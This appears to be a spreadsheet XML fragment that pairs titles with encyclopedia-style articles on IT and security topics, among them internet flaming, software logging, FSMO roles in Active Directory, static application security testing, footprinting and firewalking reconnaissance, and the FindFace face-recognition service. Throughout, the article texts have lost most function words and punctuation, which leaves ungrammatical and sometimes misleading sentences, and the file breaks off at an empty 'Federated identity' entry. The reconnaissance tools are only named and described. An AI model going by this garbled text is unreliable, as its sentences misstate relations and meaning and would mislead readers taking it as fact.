arguments. respect, interesting parts online corpus flame wars "outbursts heated, short dense debates, ocean evenly distributed polite messages". mass flamewar mass flamewar flamewar grows single post comment multiple comments posts quickly, area original post mass flamewar usually lasts multiple weeks months first post posted died out. political flaming political flaming typically occur people views challenged seek anger known. through covering one's identity people likely engage political flaming. 2015 study conducted hutchens, cicchirillo, hmielowski, found "those experienced political discussions—either online offline—were likely indicate would respond flame", also found verbal aggression also played role person engaging political flaming. corporate flaming corporate flaming large number critical comments, usually aggressive insulting, directed company's employees, products, brands. common causes include inappropriate behavior company employees, negative customer experiences, inadequate care customers influencers, violation ethical principles, along apparent injustices inappropriate reactions. flame wars result reputational damage, decreased consumer confidence, drops stock prices company assets, increased liabilities, increased lawsuits, decrease customers, influencers sponsors. based assessment damage, companies take years recover flame detract core purpose. kayser notes companies prepare possible flame wars creating alerts predefined "blacklist" words monitoring fast-growing topics company. alternatively, kayser, points flame lead positive experience company. based content, could shared across multiple platforms increase company recognition, social media fans/followers, brand presence, purchases, brand loyalty. therefore, type marketing results flame lead higher profits brand recognition broader scale. nevertheless, encouraged company utilizes social media aware content could used flame treated emergency. examples subject polarizing nature feasibly cause flaming. would expect medium internet, technology common topic. perennial debates users competing operating systems, windows, classic macos, linux operating system android operating system, users intel processors, users nintendo switch, playstation xbox video game systems, often escalate seemingly unending "flame wars", also called software wars. successive technology released, develops outspoken base, allowing arguments begin anew. popular culture continues generate large amounts flaming countless flame wars across internet, constant debates fans star trek star wars. ongoing discussion current celebrities television personalities within popular culture also frequently sparks debate. 2005, author anne rice became involved flame sorts review boards online retailer amazon.com several reviewers posted scathing comments latest novel. rice responded comments lengthy response, quickly feedback users.in 2007, tech expert kathy sierra victim flaming image depicted mutilated body spread around online forums. addition doctored photo spread virally, social security number home address made public well. consequently, sierra effectively gave technology career response ensuing harassment threats received result flaming.in november 2007, popular audio-visual discussion site forum temporarily closed blu-ray discussion forums site reported, "physical threats involved police possible legal action" advocates rival formats.the 2016 presidential election, flame take place republican candidate donald trump democratic candidate hillary clinton. barbs exchanged highly publicized example political flaming flame war. legal implications flaming varies severity reaction states imposing sort sanction. laws vary country country, cases, constant flaming considered cyber harassment, result internet service provider action prevent access site flamed. however, social networks become closely connected people real life, harsh words considered defamation person. instance, south korean identity verification created help control flaming stop "malicious internet" opponents argue infringes right free speech. also references further reading elly konijn, (2008). mediated interpersonal communication. taylor francis. isbn 978-0-8058-6303-1. sally sieloff magnan, (2008). mediating discourse online. john benjamins publishing company. isbn 978-90-272-0519-3. kirschner, paul (2003). visualizing argumentation: software tools collaborative educational sense-making. london: springer. isbn 978-1-85233-664-6. ashlee humphreys, (2016). social media enduring principles. oxford university press. isbn 978-0199328437. external links interactional reconceptualization "flaming" other problematic messages, patrick o'sullivan andrew flanagin flamewarriors.net older flamebait reference usenet, 1985 (via google groups) flame management handling crisis social media</t>
  </si>
  <si>
    <t>Logging (software)</t>
  </si>
  <si>
    <t>computing, file file records either events occur operating system software runs, messages different users communication software. logging keeping log. simplest case, messages written single file. transaction file (i.e., log) communications system users system, data collection method automatically captures type, content, time transactions made person terminal system. searching, transaction electronic record interactions occurred searching episode search engine users searching information search engine. many operating systems, software frameworks programs include logging system. widely used logging standard syslog, defined internet engineering task force (ietf) 5424). syslog standard enables dedicated, standardized subsystem generate, filter, record, analyze messages. this relieves software developers design code logging systems. event logs event logs record events taking place execution system order provide audit trail used understand activity system diagnose problems. they essential understand activities complex systems, particularly case applications little user interaction (such server applications). also useful combine file entries multiple sources. this approach, combination statistical analysis, yield correlations seemingly unrelated events different servers. other solutions employ network-wide querying reporting. transaction logs most database systems maintain kind transaction log, mainly intended audit trail later analysis, intended human-readable. these logs record changes stored data allow database recover crashes data errors maintain stored data consistent state. thus, database systems usually general event logs transaction logs. transaction analysis data stored transaction logs search engines, intranets, sites provide valuable insight understanding information-searching process online searchers. this understanding enlighten information system design, interface development, devising information architecture content collections. message logs internet relay chat (irc), instant messaging (im) programs, peer-to-peer file sharing clients chat functions, multiplayer games (especially mmorpgs) commonly ability automatically save textual communication, public (irc channel/im conference/mmo public/party chat messages) private chat users, message logs. message logs almost universally plain text files, voip clients (which support textual chat, e.g. skype) might save html files custom format ease reading enable encryption. internet relay chat (irc) case software, message logs often include system/server messages entries related channel user changes (e.g. topic change, user joins/exits/kicks/bans, nickname changes, user status changes), making like combined message/event channel question, comparable true server event log, records user-visible events time frame user spent connected certain channel. instant messaging instant messaging voip clients often offer chance store encrypted logs enhance user's privacy. these logs require password decrypted viewed, often handled respective writing application. server server file several files) automatically created maintained server consisting list activities performed. typical example server maintains history page requests. maintains standard format (the common format) server files, proprietary formats exist. more recent entries typically appended file. information request, including client address, request date/time, page requested, http code, bytes served, user agent, referrer typically added. this data combined single file, separated distinct logs, access log, error log, referrer log. however, server logs typically collect user-specific information. these files usually accessible general internet users, webmaster administrative person internet service. statistical analysis server used examine traffic patterns time day, week, referrer, user agent. efficient site administration, adequate hosting resources fine tuning sales efforts aided analysis server logs. also common format digital traces event viewer java logging frameworks logging frameworks java .net logging frameworks logging frameworks .net list analytics software logbook log4j management intelligence logging service (laas) pantheios logging library runtime intelligence server counter analysis software references</t>
  </si>
  <si>
    <t>London Hackspace</t>
  </si>
  <si>
    <t>london hackspace (abbreviated lhs) non-profit hackerspace london, established 2009. originally located islington, moved hoxton july 2010, later wembley. 2012, largest hackerspace united kingdom membership, 1000 paying members. founding group held first meeting olde cheshire cheese february 2009. organisational status london hackspace became world's first virtualised non-profit corporation july 2011 members voted oneclickorgs platform carry procedures board directors. facilities london hackspace wide variety facilities split across floors large park, including equipment electronics, printing, craft, laser cutting, woodwork, metalwork, biology, amateur radio, robotics, many things. incomplete list equipment found wiki. projects maker faire 2011, members combined xbox kinect pair tesla coils make evil genius simulator. nanode, networked arduino clone developed space. workshops events london hackspace hosts regular workshops biohacking, lockpicking, amateur radio hacking oneclickorgs. additional irregular workshops cover arduino programming, python programming openstreetmap mapping.there also regular tuesday night social event. references external links homepage wiki event calendar</t>
  </si>
  <si>
    <t>LogLogic</t>
  </si>
  <si>
    <t>loglogic technology company specializes security management, compliance reporting, operations products. loglogic developed first appliance-based management platform. loglogic's management platform collects correlates user activity event data. loglogic's products used many world's largest enterprises rapidly identify alert compliance violations, policy breaches, cyber attacks, insider threats. history loglogic founded 2002 jason destefano, thomas grabowski, peter jordan minneapolis, company established help system administrators automate management data diagnose system problems.in 2009, loglogic released database security compliance management products acquired exaprotect, security information event management (siem) company.in 2012, company acquired tibco. products loglogic makes computer appliance system administrators, compliance managers, cios cisos collect logs events network devices, servers, databases, operating systems applications. appliances also translate various formats, search logs, generate alerts create graphs logging trends.loglogic products help several industry compliance mandates standards, payment card industry data security standard (pci dss), health insurance portability accountability (hipaa) sarbanes–oxley (sox). also loggly sumo logic splunk graylog humio investors focus ventures, sequoia capital, telesoft partners, worldview technology partners, invesco private capital, ventures, cm-cic private equity, crédit agricole private equity elaia partners references external links official website loglogic corporate blog</t>
  </si>
  <si>
    <t>Statistical disclosure control</t>
  </si>
  <si>
    <t>statistical disclosure control (sdc), also known statistical disclosure limitation (sdl) disclosure avoidance, technique used data-driven research ensure person organization identifiable results analysis survey administrative data, release microdata. purpose protect confidentiality respondents subjects research.sdc usually refers 'output sdc'; ensuring that, example, published table graph disclosure confidential information respondents. also describes protection methods applied data: example, removing names addresses, limiting extreme values, swapping problematic observations. this sometimes referred 'input sdc', commonly called anonymization, de-identification, microdata protection. textbooks typically cover input tabular data protection (but parts output sdc). this problems direct interest statistical agencies supported development field. analytical environments, output rules developed statistical agencies generally used data managers began arguing specific output research. necessity many kinds social, economic health research potentially sensitive data basis research, survey census data, records, health records, educational information, etc. such information usually given confidence, and, case administrative data, always purpose research. researchers usually interested information single person business; looking trends among larger groups people. however, data first place, linked individual people businesses, ensures cannot identified published data, matter detailed broad.it possible data analysis, researcher somehow singles person business research. example, researcher identify exceptionally good service geriatric department within hospital remote area, hospital provides care. case, data analysis 'discloses' identity hospital, even dataset used analysis properly anonymised de-identified. statistical disclosure control identify disclosure risk ensure results analysis altered protect confidentiality. requires balance protecting confidentiality ensuring results data analysis still useful statistical research. output there main approaches output sdc: principles-based rules-based. principles-based systems, disclosure control attempts uphold specific fundamental principles—for example, person identifiable released microdata". rules-based systems, contrast, evidenced specific rules person performing disclosure control follows, data presumed safe release. general, official statistics rules-based; research environments likely principles-based. research environments, choice output-checking regime significant operational implications. rules-based rules-based sdc, rigid rules used determine whether results data analysis released. rules applied consistently, makes obvious kinds output acceptable. rules-based systems good ensuring consistency across time, across data sources, across production teams, makes appealing statistical agencies. rules-based systems also work well remote serves microdata.no lissy. however, rules inflexible, either disclosive information still slip through, rules over-restrictive allow results broad useful analysis published. practice, research environments running rules-based systems bring flexibility hoc' systems.the northern ireland statistics research agency uses rules-based approach releasing statistics research results. principles-based principles-based sdc, researcher output checker trained sdc. they receive rules, rules-of-thumb rather hard rules rules-based sdc. this means principle, output approved refused. rules-of-thumb starting point researcher. researcher request outputs breach 'rules thumb' long non-disclosive important exceptional request. researcher prove 'unsafe' outputs non-disclosive, checker final say. since hard rules, requires knowledge disclosure risks judgment researcher checker. requires training understanding statistics data analysis, although argued used make process efficient rules-based model. data service employs principles-based approach statistical disclosure control secure data service. critiques many contemporary statistical disclosure control techniques, generalization cell suppression, shown vulnerable attack hypothetical data intruder. example, showed 2009 complementary cell suppression typically leads "over-protected" solutions need suppress primary complementary cells, even lead compromise sensitive data exact intervals reported.a substantive criticism theoretical models used explore control measures appropriate guides practical action. hafner provide practical example change perspective generate substantially different results. tools mu-argus sdcmicro open-source tools input sdc. tau-argus sdctable open-source tools tabular data protection. also privacy research participants references</t>
  </si>
  <si>
    <t>LogDNA</t>
  </si>
  <si>
    <t>logdna technology company located silicon valley, california. their management solution enables devops teams aggregate system application logs single platform. automatic parsing, natural language search real-time alerts allow teams develop debug applications. history company founded chris nguyen 2016 participating combinator’s winter 2015 batch. technology logdna provides saas-based management service helps centralize logs applications, servers, platforms systems viewer. features include smart parsing intelligent filters, works infrastructure architecture, supporting numerous platforms ingestion methods, including syslog, code libraries, logdna open-source agent, aws, google cloud, more. partnership 2018, logdna partnered launch observability offerings cloud kubernetes service. analysis logdna management solution helps users gain detailed insights system application logs. cloud activity tracker logdna tracks events cloud services users full visibility deployments. both offerings available cloud service catalog. awards recognition 2020, logdna cloud embed excellence award think 2020 conference named enterprise tech list. also 2020, logdna spring crowd best software awards categories easiest setup, most implementable, momentum leader best usability. 2019, forbes included logdna cloud rising stars list, upstart tech named logdna “most implementable” technology, logdna included silicon review’s smartest companies year list. references</t>
  </si>
  <si>
    <t>Flexible single master operation</t>
  </si>
  <si>
    <t>flexible single master operations (fsmo, sometimes "floating"; pronounced fiz-mo), single master operation operations master, feature microsoft's active directory (ad). 2005, term fsmo deprecated favour operations masters.fsmo specialized domain controller (dc) tasks, used standard data transfer update methods inadequate. normally relies multiple peer dcs, copy database, synchronized multi-master replication. tasks suited multi-master replication viable single-master database fsmos. fsmo roles per-domain roles these roles applicable domain level (i.e., every domain forest): emulator (primary domain controller) this role used fsmo roles widest range functions. domain controller holds emulator role crucial mixed environment windows bdcs still present. this emulator role emulates functions windows pdc. even windows domain controllers migrated windows 2000 later, domain controller holds emulator role still lot. emulator domain source time synchronization domain controllers; multi-domain forest, emulator domain synchronizes forest root emulator. domain member computers synchronize respective domain controllers. critically important computer clocks synchronized across forest excessive clock skew causes kerberos authentication fail. addition, password changes occur emulator receive priority replication. master (relative this fsmo role owner single responsible processing pool requests within given domain. also responsible moving object domain another interdomain object move. when creates security principal object user group, attaches unique object. this consists domain (the sids created domain) relative (rid) unique security principal created domain. each domain allocated pool rids allowed assign security principals creates. when dc's allocated pool falls threshold, issues request additional rids domain's master fsmo role owner, master fsmo role owner responds request retrieving rids domain's unallocated pool assigns pool requesting infrastructure master purpose role ensure cross-domain object references correctly handled. example, user domain added security group different domain, infrastructure master makes sure done properly. however, active directory deployment single domain, infrastructure master role work all, even multi-domain environment rarely used except complex user administration tasks performed. this applies domain partition (default naming context) only. netdom query fsmo ntdsutil query domain partition. however, every application partition, including forest domain-level domain zones infrastructure master. holder role stored fsmoroleowner attribute infrastructure object root partition, modified adsiedit, example modify fsmoroleowner attribute cn=infrastructure,dc=domaindnszones,dc=yourdomain,dc=tld object cn=ntdssettings,cn=name_of_dc,cn=servers,cn=drsite,cn=sites,cn=configuration,dc=yourdomain,dc=tld. per-forest roles these roles unique forest level (both located forest root domain): schema master purpose role replicate schema changes domain controllers forest. since schema active directory rarely changed, however, schema master role rarely work. this role typically involved deployment exchange server skype business server, well domain controllers version another version, situations involve making changes active directory schema. domain naming master forest-specific fsmo role domain naming master, role also resides forest root domain. domain naming master role processes changes namespace, example adding child domain vancouver.mycompany.com forest root domain mycompany.com requires role available. failure role function correctly prevent addition child domain domain tree. moving fsmo roles domain controllers default assigns operations master roles first created forest. provide fault tolerance, multiple domain controllers available within domain forest. domains created forest, first domain holds domain-wide fsmo roles. this satisfactory position domain large number domain controllers. microsoft recommends careful division fsmo roles, standby ready take role. emulator master possible. schema master domain naming master also when fsmo role transferred different original fsmo holder fsmo holder communicate ensure data lost transfer. original fsmo holder experienced unrecoverable failure, another made "seize" lost roles; however, risk data loss lack communications. seizing roles domain controller instead transferring prevents domain controller hosting fsmo role again, except emulator infrastructure master operation roles. corruption occur within active directory. fsmo roles easily moved using snap-ins using ntdsutil, command line-based tool. fsmo roles global catalog certain fsmo roles depend global catalog (gc) server well. when forest initially created, first domain controller global catalog server default. global catalog provides several functions. stores object data information, manages queries data objects attributes well provides data allow network logon. often domain controllers also global catalog servers. case, infrastructure master role must housed domain controller also houses copy global catalog multi-domain forest, combination roles host cause unexpected (and potentially damaging) behaviour multi-domain environment. however, domain naming master role housed also references external links "6.1.5.3 master fsmo role". [ms-adts]: active directory technical specification. microsoft. "how view transfer fsmo roles windows server 2003". support. microsoft. september 2011. tulloch, mitch march 2005). "how view transfer fsmo roles windows server 2003". windowsnetworking.com. techgenix. "transferring fsmo roles windows server 2008". technetwiki. microsoft. arik, ertugrul december 2014). "how determine fsmo role holder (fsmoroleowner attribute)". active directory coding.</t>
  </si>
  <si>
    <t>Static application security testing</t>
  </si>
  <si>
    <t>static application security testing (sast) used secure software reviewing source code software identify sources vulnerabilities. although process statically analyzing source code existed long computers existed, technique spread security late first public discussion injection 1998 applications integrated technologies like javascript flash. unlike dynamic application security testing (dast) tools black-box testing application functionality, sast tools focus code content application, white-box testing. sast tool scans source code applications components identify potential security vulnerabilities software architecture. static analysis tools detect estimated existing security vulnerabilities.in sdlc, sast performed early development process code level, also pieces code components together consistent testing environment. sast also used software quality assurance. even many resulting false-positive impede adoption developerssast tools integrated development process help development teams primarily focusing developing delivering software respecting requested specifications. sast tools, like security tools, focus reducing risk downtime applications private information stored applications compromised. year 2018, privacy rights clearinghouse database shows million records compromised hacking. overview application security tests applications release: static application security testing (sast), dynamic application security testing (dast), interactive application security testing (iast), combination two.static analysis tools examine text program syntactically. they look fixed patterns rules source code. theoretically, also examine compiled form software. this technique relies instrumentation code mapping compiled components source code components identify issues. static analysis done manually code review auditing code different purposes, including security, time-consuming.the precision sast tool determined scope analysis specific techniques used identify vulnerabilities. different levels analysis include: function level sequences instruction. file class-level extensible program-code-template object creation. application level program group programs interact.the scope analysis determines accuracy capacity detect vulnerabilities using contextual information.at function level, common technique construction abstract syntax tree control flow data within function.since late 90s, need adapt business challenges transformed software development componentization. enforced processes organization development teams following flow data components application group applications allows validation required calls dedicated procedures sanitization proper actions taken taint data specific pieces code.the rise applications entailed testing them: verizon data breach reports 2016 data breaches application vulnerabilities. well external security validations, rise focus internal threats. clearswift insider threat index (citi) reported respondents 2015 survey said experienced security incidents previous months breaches originated insiders. hadlington categorized internal threats categories: malicious, accidental, unintentional. mobile applications' explosive growth implies securing applications earlier development process reduce malicious code development. sast strengths earlier vulnerability fixed sdlc, cheaper fix. costs development times lower testing, times lower production. sast tools automatically, either code level application-level require interaction. when integrated ci/cd context, sast tools used automatically stop integration process critical vulnerabilities identified.because tool scans entire source-code, cover 100% dynamic application security testing covers execution possibly missing part application, unsecured configuration configuration files. sast tools offer extended functionalities quality architectural testing. there direct correlation quality security. quality software also poorly secured software. sast weaknesses even though developers positive usage sast tools, different challenges adoption sast tools developers.with agile processes software development, early integration sast generates many bugs, developers using framework focus first features delivery.scanning many lines code sast tools result hundreds thousands vulnerability warnings single application. generates many false-positives, increasing investigation time reducing trust tools. this particularly case context vulnerability cannot caught tool also security testing lint (software) dynamic application security testing interactive application security testing static program analysis references</t>
  </si>
  <si>
    <t>Statewatch</t>
  </si>
  <si>
    <t>statewatch non-profit organization founded 1991 monitors civil liberties issues european union encourages investigative reporting research.the organization three free databases: large database news, articles links since 1991, statewatch european monitoring documentation centre (semdoc) monitors justice home affairs measures since 1993.the predecessor statewatch "state research" (1977-1982), produced bi-monthly bulletin carried research. among activities, monitors anti-terrorist legislation, passenger name record observatory, concerned asylum issues, data privacy, biometrics, etc. organization director, tony bunyan, received awards civil rights activism including 1998 award british campaign freedom information 2011 "long walk" award liberty's human rights awards. references external links official website</t>
  </si>
  <si>
    <t>Statement on Auditing Standards No. 99: Consideration of Fraud</t>
  </si>
  <si>
    <t>statement auditing standards consideration fraud financial statement audit, commonly abbreviated auditing statement issued auditing standards board american institute certified public accountants (aicpa) october 2002. original exposure draft distributed february 2002. please pcaob 2401. supersedes issued partly response contemporary accounting scandals enron, worldcom, adelphia, tyco. standard incorporates recommendations various contributors including international auditing assurance standards board. became effective audits financial statements periods beginning december 2002. components describes fraud characteristics. defines fraud intentional results material misstatement financial statements. there types fraud considered: misstatements arising fraudulent financial reporting (e.g. falsification accounting records) misstatements arising misappropriation assets (e.g. theft assets fraudulent expenditures). standard describes fraud triangle. generally, three 'fraud triangle' conditions present fraud occurs. first, incentive pressure provides reason commit fraud. second, opportunity fraud perpetrated (e.g. absence controls, ineffective controls, ability management override controls.) third, individuals committing fraud possess attitude enables rationalize fraud. requires 'brainstorming' sessions discuss entity's financial statements might susceptible material misstatement fraud. this requirement concept audit standards primary objectives. first objective engagement team opportunity seasoned team members share experiences client fraud might perpetrated concealed. second objective proper "tone top" conducting engagement. brainstorming session conducted manner models proper degree professional skepticism sets culture entire audit. requires auditor gather information necessary identify risks material misstatement fraud following making inquiries management others within entity considering results analytical procedures performed planning audit. considering fraud risk factors. considering certain informationsas requires auditors management questions awareness understanding fraud. auditors make decision whether need 'educate' management fraud types controls deter detect fraud. standard also requires auditors make inquiries audit committee, internal audit personnel others within entity. requires auditor information gathered identify risks result material misstatement. this section provides guidance support identify assess risks. challenges auditors change think assessing fraud risks. auditors identify risks synthesize risks could lead material misstatement. this section specifically requires improper revenue recognition management override controls considered. requires auditor evaluate entity's programs controls address identified risks material misstatement. provides specific examples programs controls large small businesses. auditor consider controls mitigate identified fraud risks. requires auditor assess risks material misstatement fraud throughout audit evaluate completion audit whether accumulated results auditing procedures observations affect assessment. standard provides examples conditions identified audit might indicate fraud. example management denying auditors access operations staff including security, operations, systems development personnel. auditors must determine whether results tests affect assessment. provides guidance regarding auditor's communications fraud management, audit committee, others. standard requires evidence fraud exist must communicated management others. level severity insignificant. describes documentation requirements. significantly extends documentation requirements previous standard. auditors must document: brainstorming session occurred participated, procedures performed obtain information identify assess fraud risk, specific risks material misstatement fraud (must specifically include discussion revenue recognition) auditor's response risks, results procedures performed address risk management override controls, conditions analytical relationships additional audit procedures responses, nature communications fraud made management others. criticisms primary criticism standard many procedures suggested rather required. example, suggested auditors consider surprise procedures like showing unannounced inventory count. actual practice auditors often tell clients inventory locations going 'observe.' telling clients locations going audited makes easier commit inventory fraud. similar criticism close expectation gaps. guidelines suggestions provided standard increase expectations profession. result, auditors must consider requirements minimum level work required detect fraud. they must prepared defend decision pursue recommended procedures listed related regulations gramm-leach-bliley sarbanes-oxley health insurance portability accountability (hipaa) california senate bill 1386 (2002) fisma also information technology audit external links implementation guide friend foe? section consideration fraud financial statement audit (full statement)</t>
  </si>
  <si>
    <t>Location-based authentication</t>
  </si>
  <si>
    <t>location-based authentication special procedure prove individual's identity appearance simply detecting presence distinct location. enable location-based authentication, special combination objects required. firsthand, individual applies identified authenticated present sign identity. secondly, individual carry least human authentication factor recognized distinct location. thirdly, distinct location must equipped resident means capable determine coincidence individual distinct location. distinctiveness locating basic requirement safe location-based authentication well-defined separation locations well equally well-defined proximity applying individual location. applications location-based authentication standard procedure grant access area detecting person entrance. then course discrimination recommended recognise person entering leaving, prevent persons gaining access ticket only. location-based authentication standard procedure access machine, especially working position computer functions computer. location-based authentication novel procedure provide additional information authenticity product. challenges 2008, offered technical solution simple location-based authentication includes method limiting granted access presence, hence terminating granted authentication leave. this defines mandate either include additional procedure detecting leave closing granted access, limiting granted time access combining method another specially suited authentication factor also authentication factor authentication time-based authentication real-time locating security token wireless references research work location-based security user's transactions across different domains. dhavalkumar shah</t>
  </si>
  <si>
    <t>Fleet Electronic Warfare Center</t>
  </si>
  <si>
    <t>fleet electronic warfare center (fewc) organization established naval network warfare command (nnwc) 2008 center navy fleet electronic warfare (ew) operational tactical issues. currently located navy information dominance forces (nidf) headquarters, suffolk, independent directorate. background demand focus greater ever before. recent operations throughout world, particular iraq afghanistan, highlighted crucial support required joint force commander. these challenges direct application ability perform navy missions.the impetus establishment fewc began 2005 chief naval operations offered navy expertise army leadership counter growing, deadly threat radio controlled improvised explosive devices (rcieds) joint fight iraq. this resulted formation joint crew (counter rcied electronic warfare) composite squadron (jccs-1). navy deployed hundreds ew-qualified sailors individual augmentation (ia) assignments operation iraqi freedom operation enduring freedom significant success. this successful application fight highlights positive impact battlefield, importantly, lack capability could impair combat capability.in 2007, nnwc conducted navy study provide foundation development strategic implementation plan. study gave comprehensive overview organizational challenges facing fleet negative consequences incurred result challenges. over interviews conducted fleet stakeholders echelon iii, commands including operational commands, resource sponsors, acquisition procurement, research development, doctrine development, fleet training individual training. these stakeholder interviews also involved major warfare communities air, surface, submarine, expeditionary, information warfare. results navy study culminated development value chain focusing following areas: fleet integration, capabilities requirements, training, force management, doctrine/ttp policy. this value chain results stakeholder analysis development series strategic goals, objectives, initiatives well formation fewc whose sole mission focused improvement fleet readiness. purpose fewc three major roles: consistently maintain visibility current, accurate information spectrum challenges. perform management functions required enable readiness group (ewrg) resolve deficiencies and, commander, navy forces, advise fleet commander. fleet's ew/spectrum central" thoroughly coordinate answers emergent requirements higher echelon commanders fleet operational coordination spans across naval platforms—air, surface, subsurface expeditionary—and across doctrine, organization, training, material, leadership education, personnel facilities (dotmlpf).the fewc also provides operational control navy marine corps spectrum center handle operational spectrum issues electromagnetic battlespace across globe. fewc ewrg structure effectively organize fewc, nidf, operational agent leads fleet stakeholders cohesive team facilitating coordination collaboration efforts among organizations influence fleet readiness. end, nnwc previously established integration improvement program (ewiip), formal process identify fleet-centric issues deficiencies generate annual integrated priority capabilities list (ipcl) prioritize operational fleet requirements improve fleet readiness. navy cyber forces (ncf) modified original structure establishing readiness group (ewrg) focus specific elements readiness. ewrg consists fleet stakeholder command organization representatives responsible identifying promulgating fleet priorities ewrg members' familiarity command's organization's capabilities requirements. ultimate goal ewiip improve capability, capacity readiness fleet ewrg identify capability gaps across doctrine, organization, training, materiel, leadership, personnel, facilities (dotmlpf) provide readiness recommendations mitigating actions support planning, programming, budgeting execution (ppbe) process. these capability gaps recommendations reviewed applicability resolve operational fleet requirements. currently four standing ewrgs: doctrine tactics (d&amp;t), develops recommendations changes existing doctrine tactics, techniques procedures (ttp) doctrine response emerging threats technology. training exercises (t&amp;e), responsible identifying unit strike group fleet response training plan (frtp) training exercise readiness shortfalls identifying solutions existing emerging training exercise capability/capacity gaps. equipment experimentation (e&amp;e), tasked review material capability, maintenance facility gaps, determine utility maturity emerging/enabling technologies response threat based assessments emerging threat technology. workforce development (wd), responsible identifying manning leadership/education shortfalls solutions existing emerging manning leadership/education capability/capacity gaps.ergs meet fall ewiip symposium, focusing assessing state spectrum capabilities potential gaps capabilities. this assessment provides analytical rigor supporting follow-on dotmlpf changes address operational capability capacity gaps ipcl. also electronic warfare directed-energy weapon improvised explosive device ea-6b prowler ea-18g growler ep-3 aries an/slq-32 electronic warfare suite elint electronic warfare officer electronic countermeasures electromagnetic bomb joint electronic warfare center office naval research united states naval research laboratory comsublant united states fleet forces command battle latakia battle beams association crows references external links infodomain magazine, summer 2009</t>
  </si>
  <si>
    <t>Footprinting</t>
  </si>
  <si>
    <t>footprinting (also known reconnaissance) technique used gathering information computer systems entities belong information, hacker might various tools technologies. this information useful hacker trying crack whole system.when used computer security lexicon, "footprinting" generally refers pre-attack phases; tasks performed actual attack. some tools used footprinting spade, nslookup, traceroute, nmap neotrace. techniques used footprinting queries network enumeration network queries operating system identification software used footprinting entity information wireshark uses footprinting allows hacker gain information target system network. this information used carry attacks system. that reason named pre-attack, since information reviewed order complete successful resolution attack. footprinting also used ethical hackers penetration testers find security flaws vulnerabilities within company's network malicious hacker does. types footprinting there types footprinting used: active footprinting passive footprinting. active footprinting process using tools techniques, performing ping sweep using traceroute command, gather information target. active footprinting trigger target's intrusion detection system (ids) logged, thus requires level stealth successfully passive footprinting process gathering information target innocuous, passive, means. browsing target's website, visiting social media profiles employees, searching website whois, performing google search target ways passive footprinting. passive footprinting stealthier method since trigger target's otherwise alert target information gathered. crawling crawling process surfing internet required information target. sites surfed include target's website, blogs social networks. information obtained method helpful methods. whois whois application used information target website, administrator's e-mail address details registration. whois large database contains information approximately clearnet websites. searched domain name. search engines search engines google also used gather information target system. depends well knows search engines collect information. used properly, attacker gather much information company, career, policies, etc. traceroute information also gathered using command tracert ("traceroute"), used trace path user target system networks. that becomes clear request forwarded devices. linux systems, tracepath traceroute commands also available traceroute operations. negative search negative search reveal websites performed target website. negative websites resources insight flaws target website. information gathered attack performed company, following information gathered. company details, employee details email addresses. relation companies. project details involving companies. legal documents company. news relating company website. patents trademarks regarding particular company. important dates regarding projects. also digital footprint network security references</t>
  </si>
  <si>
    <t>Firewalk (computing)</t>
  </si>
  <si>
    <t>firewalking technique developed mike schiffman david goldsmith utilizes traceroute techniques values analyze packet responses order determine gateway (access control list) filters networks. active reconnaissance network security analysis technique attempts determine layer protocols specific firewall allow. firewalk software tool performs firewalking. protect firewall gateway firewalking block icmp time exceeded messages. also access control list firewall (computing) traceroute references external links firewalk tool, open source tool determines gateway filters maps networks analyzing packets responses. wooterwoot, open source tools builds check point, cisco asa, netscreen policies logfiles. firewalk linux/unix verify acls check firewall rule sets, article using firewalk, lori hyde ccna. firewalk(8) linux page giac sans institute description firewalking</t>
  </si>
  <si>
    <t>FindFace</t>
  </si>
  <si>
    <t>findface face recognition technology developed russian company ntechlab specializes neural network tools. company provides line services state various business sectors based findface algorithm. previously, technology used service helped find people social network using photos. technology 2015 ntechlab algorithm megaface benchmark challenge, organized university washington.in 2016, ntechlab admitted official testing biometrics technology nist among three russian companies. according results testing, algorithm took first position ranking global benchmark facial recognition vendor test.in spring 2017, ntechlabs algorithm ranked first facial recognition vendor test.also march 2017, ntechlabs findface algorithm emotionnet challenge automatic emotion recognition competition organized ohio state university. development teams took part competition, able fulfill conditions full. fall 2017, ntechlab facial recognition technology competition organized jointly nist iarpa, nominations three (“identification speed” “verification accuracy”).in september 2018, ntechlab algorithm recognizing pedestrian silhouettes prize wider pedestrian challenge, competition detecting pedestrians cyclists organized amazon sensetime.findface employs facial recognition neural network algorithm developed n-tech.lab match faces photographs uploaded users faces photographs published reported accuracy percent. different sources point ntech lab's technology accuracy 85.081% 99%. history technology made public service helps find people social network using photos february 2016.in 2016, number visitors service exceeded million people.in august 2016 ntechlab co-founder artyom kukharenko, handed post head company mikhail ivanov.in september 2018, service stopped providing facility search people's social profiles, transformed ntechlab line services various business sectors application cases 2016–2018 ntechlab presented several scenarios using findface technology, later formed basis company's commercial products: june 2016, findface service introduced alfa future people festival: guests event could identify application, obtain possibility receive photos, taken event, social network profiles. participation experiment voluntary violate confidentiality festival visitors.• 2017, ntechlab face recognition algorithms built moscow city video surveillance system operated moscow department information technology system uses database ministry internal affairs find correspondences video. alleged system search criminals fight terrorism.• february 2018, became known ntechlab technologies used tatarstan. announced early 2019, pilot project almetyevsk showed effectiveness technology ensuring public safety.• april 2018, announced ntechlab face recognition algorithm implemented large leto shopping entertainment complex st.petersburg. leto authorities collect non-personal information visitors without identifying them. analysis help determine demographic composition customers, identify repeated visits, estimate amount time spent visitors purchases, compare customer behavior different stores july 2018, ntechlab application implemented water amusement park līvu akvaparks jurmala. after visiting park, clients able simplify search photographs containing image findface security application, implemented several cities fifa 2018 world russia, made possible detain people included offenders' bases, federal wanted list thanks findface security application, possible prevent theft sponsorship part matches fifa world 2018 russia. with help video cameras, possible restore chain events identify involved, discovered detained subsequent matches. developers ntechlab company created service founded 2015 graduate moscow state university faculty computational mathematics cybernetics artyom kukharenko businessman alexander kabakov. december 2021 alexander kabakov resigned board directors ntechlab. controversial 2022, ntechlab accused assisting russian government tracking thousands political activists unconstitutional detentions arrests.in 2016, findface generated controversy used deanonymize russian pornography actresses alleged prostitutes. these efforts organized users russian imageboard dvach claimed women industry “corrupt deceptive”, according global voices. addition, findface characterized major step erosion anonymity. references</t>
  </si>
  <si>
    <t>Federated identity</t>
  </si>
  <si>
